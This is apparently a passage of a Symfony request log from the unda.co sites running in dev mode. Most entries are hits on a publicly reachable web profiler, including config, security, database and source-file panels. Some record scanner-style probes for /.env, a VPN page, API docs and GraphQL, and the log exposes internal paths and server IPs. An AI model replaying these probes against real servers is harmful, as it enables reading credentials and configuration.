  3793. [2025-12-18 10:50:33] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=form","method":"GET"} []
  3794. [2025-12-18 11:05:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"51ec68","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/51ec68?panel=config","method":"GET"} []
  3795. [2025-12-18 11:05:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3796. [2025-12-18 11:06:06] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"17d1fc","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/17d1fc","method":"GET"} []
  3797. [2025-12-18 11:06:06] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3798. [2025-12-18 11:08:13] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"39ad3a","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/39ad3a","method":"GET"} []
  3799. [2025-12-18 11:08:13] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3800. [2025-12-18 11:08:24] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=twig","method":"GET"} []
  3801. [2025-12-18 11:08:24] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3802. [2025-12-18 11:18:36] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3803. [2025-12-18 11:21:55] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /.env"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /.env\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3804. [2025-12-18 11:21:58] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"POST"} []
  3805. [2025-12-18 11:22:01] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3806. [2025-12-18 11:22:02] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3807. [2025-12-18 11:22:17] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5b9b7e","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/5b9b7e?panel=time","method":"GET"} []
  3808. [2025-12-18 11:22:17] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3809. [2025-12-18 11:33:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=twig","method":"GET"} []
  3810. [2025-12-18 11:33:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3811. [2025-12-18 11:44:11] request.INFO: Matched route "_profiler_open_file". {"route":"_profiler_open_file","route_parameters":{"_controller":"web_profiler.controller.profiler:openAction","_route":"_profiler_open_file"},"request_uri":"https://unda.co/_profiler/open?file=vendor%2Fsymfony%2Fsymfony%2Fsrc%2FSymfony%2FComponent%2FSecurity%2FCore%2FAuthorization%2FVoter%2FAuthenticatedVoter.php&line=26","method":"GET"} []
  3812. [2025-12-18 11:44:29] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=cache","method":"GET"} []
  3813. [2025-12-18 11:44:29] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3814. [2025-12-18 11:44:40] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=time","method":"GET"} []
  3815. [2025-12-18 11:44:40] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3816. [2025-12-18 11:48:46] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3817. [2025-12-18 11:54:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=security","method":"GET"} []
  3818. [2025-12-18 11:54:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3819. [2025-12-18 11:56:22] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3820. [2025-12-18 12:03:37] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=request","method":"GET"} []
  3821. [2025-12-18 12:03:37] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3822. [2025-12-18 12:05:30] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0409e5","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0409e5?panel=request","method":"GET"} []
  3823. [2025-12-18 12:05:30] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3824. [2025-12-18 12:06:45] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=validator","method":"GET"} []
  3825. [2025-12-18 12:06:45] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=validator","method":"GET"} []
  3826. [2025-12-18 12:13:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b03555","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/b03555?panel=config","method":"GET"} []
  3827. [2025-12-18 12:13:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3828. [2025-12-18 12:15:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"5e3cf1","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/5e3cf1?panel=cache","method":"GET"} []
  3829. [2025-12-18 12:15:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3830. [2025-12-18 12:18:34] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"f6e651","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/f6e651?panel=db","method":"GET"} []
  3831. [2025-12-18 12:18:34] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=db","method":"GET"} []
  3832. [2025-12-18 12:20:54] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3833. [2025-12-18 12:22:50] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=time","method":"GET"} []
  3834. [2025-12-18 12:22:50] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=time","method":"GET"} []
  3835. [2025-12-18 12:23:05] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /service/api-docs/"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /service/api-docs/\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3836. [2025-12-18 12:23:09] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8098e0","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/8098e0?panel=request","method":"GET"} []
  3837. [2025-12-18 12:23:09] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3838. [2025-12-18 12:24:23] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3839. [2025-12-18 12:24:24] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3840. [2025-12-18 12:24:37] request.INFO: Matched route "_wdt". {"route":"_wdt","route_parameters":{"_controller":"web_profiler.controller.profiler:toolbarAction","token":"0a3cf4","_route":"_wdt"},"request_uri":"https://web.unda.co/_wdt/0a3cf4","method":"GET"} []
  3841. [2025-12-18 12:26:17] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"OPTIONS"} []
  3842. [2025-12-18 12:32:12] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=security","method":"GET"} []
  3843. [2025-12-18 12:32:12] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3844. [2025-12-18 12:32:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"1e9f0c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/1e9f0c","method":"GET"} []
  3845. [2025-12-18 12:32:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3846. [2025-12-18 12:32:59] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0397c8","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/0397c8?panel=router","method":"GET"} []
  3847. [2025-12-18 12:32:59] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=router","method":"GET"} []
  3848. [2025-12-18 12:32:59] request.INFO: Matched route "_profiler_router". {"route":"_profiler_router","route_parameters":{"_controller":"web_profiler.controller.router:panelAction","token":"0397c8","_route":"_profiler_router"},"request_uri":"https://www.unda.co/_profiler/0397c8/router","method":"GET"} []
  3849. [2025-12-18 12:38:31] request.INFO: Matched route "home". {"route":"home","route_parameters":{"_controller":"Hona\\AuthBundle\\Controller\\HomeController::indexAction","domain":"auth.unda.co","_route":"home"},"request_uri":"https://auth.unda.co/","method":"GET"} []
  3850. [2025-12-18 12:40:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=47.242.70.104&limit=10","method":"GET"} []
  3851. [2025-12-18 12:40:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=47.242.70.104&limit=10","method":"GET"} []
  3852. [2025-12-18 12:42:05] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=request","method":"GET"} []
  3853. [2025-12-18 12:42:05] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3854. [2025-12-18 12:42:47] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"273b59","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/273b59?panel=twig","method":"GET"} []
  3855. [2025-12-18 12:42:47] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=twig","method":"GET"} []
  3856. [2025-12-18 12:44:42] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"latest","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/latest?ip=199.45.154.156&limit=10","method":"GET"} []
  3857. [2025-12-18 12:44:42] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?ip=199.45.154.156&limit=10","method":"GET"} []
  3858. [2025-12-18 12:45:57] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"822e44","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/822e44?panel=security","method":"GET"} []
  3859. [2025-12-18 12:45:57] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=security","method":"GET"} []
  3860. [2025-12-18 12:47:21] request.INFO: Matched route "_profiler_search_results". {"route":"_profiler_search_results","route_parameters":{"_controller":"web_profiler.controller.profiler:searchResultsAction","token":"4f4271","_route":"_profiler_search_results"},"request_uri":"https://web.unda.co/_profiler/4f4271/search/results?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  3861. [2025-12-18 12:47:21] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://web.unda.co/_profiler/search_bar?ip=189.172.56.183&limit=10&method=POST","method":"GET"} []
  3862. [2025-12-18 12:50:19] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /vpn/index.html"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /vpn/index.html\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3863. [2025-12-18 12:50:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=config","method":"GET"} []
  3864. [2025-12-18 12:50:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=config","method":"GET"} []
  3865. [2025-12-18 12:52:23] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"69c165","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/69c165","method":"GET"} []
  3866. [2025-12-18 12:52:23] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3867. [2025-12-18 12:54:14] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"c601b4","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/c601b4?panel=logger","method":"GET"} []
  3868. [2025-12-18 12:54:14] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=logger","method":"GET"} []
  3869. [2025-12-18 12:59:52] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b?panel=cache","method":"GET"} []
  3870. [2025-12-18 12:59:52] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3871. [2025-12-18 13:08:51] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"8cbb1b","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/8cbb1b","method":"GET"} []
  3872. [2025-12-18 13:08:51] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  3873. [2025-12-18 13:08:51] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3874. [2025-12-18 13:17:49] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"9b6635","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/9b6635?panel=request","method":"GET"} []
  3875. [2025-12-18 13:17:49] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=request","method":"GET"} []
  3876. [2025-12-18 13:17:56] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"b4593c","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/b4593c?panel=exception","method":"GET"} []
  3877. [2025-12-18 13:17:56] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=exception","method":"GET"} []
  3878. [2025-12-18 13:19:25] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757?panel=cache","method":"GET"} []
  3879. [2025-12-18 13:19:25] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3880. [2025-12-18 13:25:15] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"447d8e","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/447d8e?panel=cache","method":"GET"} []
  3881. [2025-12-18 13:25:15] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar?panel=cache","method":"GET"} []
  3882. [2025-12-18 13:28:01] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"7d221d","_route":"_profiler"},"request_uri":"https://www.unda.co/_profiler/7d221d","method":"GET"} []
  3883. [2025-12-18 13:28:01] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://www.unda.co/_profiler/search_bar","method":"GET"} []
  3884. [2025-12-18 13:30:39] request.INFO: Matched route "_profiler". {"route":"_profiler","route_parameters":{"_controller":"web_profiler.controller.profiler:panelAction","token":"0e7757","_route":"_profiler"},"request_uri":"https://unda.co/_profiler/0e7757","method":"GET"} []
  3885. [2025-12-18 13:30:39] request.INFO: Matched route "_profiler_search_bar". {"route":"_profiler_search_bar","route_parameters":{"_controller":"web_profiler.controller.profiler:searchBarAction","_route":"_profiler_search_bar"},"request_uri":"https://unda.co/_profiler/search_bar","method":"GET"} []
  3886. [2025-12-18 13:32:12] request.INFO: Matched route "homepage". {"route":"homepage","route_parameters":{"_controller":"AppBundle\\Controller\\DefaultController::indexAction","_route":"homepage"},"request_uri":"https://35.175.10.94/","method":"GET"} []
  3887. [2025-12-18 13:32:48] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "GET /sitemap.xml"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"GET /sitemap.xml\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
  3888. [2025-12-18 13:33:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3889. [2025-12-18 13:33:38] request.INFO: Matched route "index_web". {"route":"index_web","route_parameters":{"_controller":"Hona\\WebBundle\\Controller\\DefaultController::indexAction","_route":"index_web"},"request_uri":"https://web.unda.co/","method":"GET"} []
  3890. [2025-12-18 13:33:39] request.ERROR: Uncaught PHP Exception Symfony\Component\HttpKernel\Exception\NotFoundHttpException: "No route found for "POST /graphql"" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php line 137 {"exception":"[object] (Symfony\\Component\\HttpKernel\\Exception\\NotFoundHttpException(code: 0): No route found for \"POST /graphql\" at /var/repositories/hona/vendor/symfony/symfony/src/Symfony/Component/HttpKernel/EventListener/RouterListener.php:137, Symfony\\Component\\Routing\\Exception\\ResourceNotFoundException(code: 0):  at /var/repositories/hona/var/cache/dev/appDevDebugProjectContainerUrlMatcher.php:2103)"} []
